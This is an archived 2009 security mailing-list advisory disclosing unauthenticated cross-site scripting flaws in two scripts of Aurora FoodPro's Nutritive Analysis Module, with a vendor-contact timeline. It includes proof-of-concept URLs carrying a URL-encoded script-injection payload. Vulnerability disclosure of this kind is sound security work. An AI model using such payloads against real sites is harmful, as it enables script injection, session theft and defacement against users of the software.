lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <63ac005e0903261743l3c08d6d1oe0f7dbb77a3dfdc4@mail.gmail.com> Date: Thu, 26 Mar 2009 18:43:03 -0600 From: Bugs NotHugs <bugsnothugs@...il.com> To: bugtraq <bugtraq@...urityfocus.com>, fd <full-disclosure@...ts.grok.org.uk> Subject: Aurora Nutritive Analysis Module Multiple XSS - Aurora Nutritive Analysis Module Multiple XSS - Description "Aurora's FoodPro is a total food production, planning and control system that provides start-to-finish control from raw food through production, service, and analysis. It provides historical, as well as current and projected data, in terms of food usage, costs, operating margins, and service." Aurora's FoodPro has a 'Nutritive Analysis Module' that provides the capability to analyze ingredients, recipes, and menus by nutritive components. Two scripts in this module suffer from cross-site scripting vulnerabilities that can be exploited without authentication. The 'nutframe.asp' and 'Menusamp.asp' scripts do not sanitize input supplied to the 'locationName' variable. - Product Aurora Information Systems, Nutritive Analysis Module, unknown version - PoC http://[site]/FoodPro/nutframe.asp?sName=Hi&locationNum=10&locationName=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%68%69%27%29%3B%3C%2F%73%63%72%69%70%74%3E&naFlag=1 http://[site]/foodpro/Menusamp.asp?sName=Hi&locationNum=07&locationName=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%68%69%27%29%3B%3C%2F%73%63%72%69%70%74%3E&naFlag=1 - Solution None - Timeline 2008-06-06: Vulnerability Discovered 2008-07-07: Disclosed to Vendor (no ack) 2008-10-05: Mail re-sent to Vendor (no ack) 2009-03-26: Disclosed to Public (no more playing nice) -- BugsNotHugs Shared Vulnerability Disclosure Account
Powered by blists - more mailing lists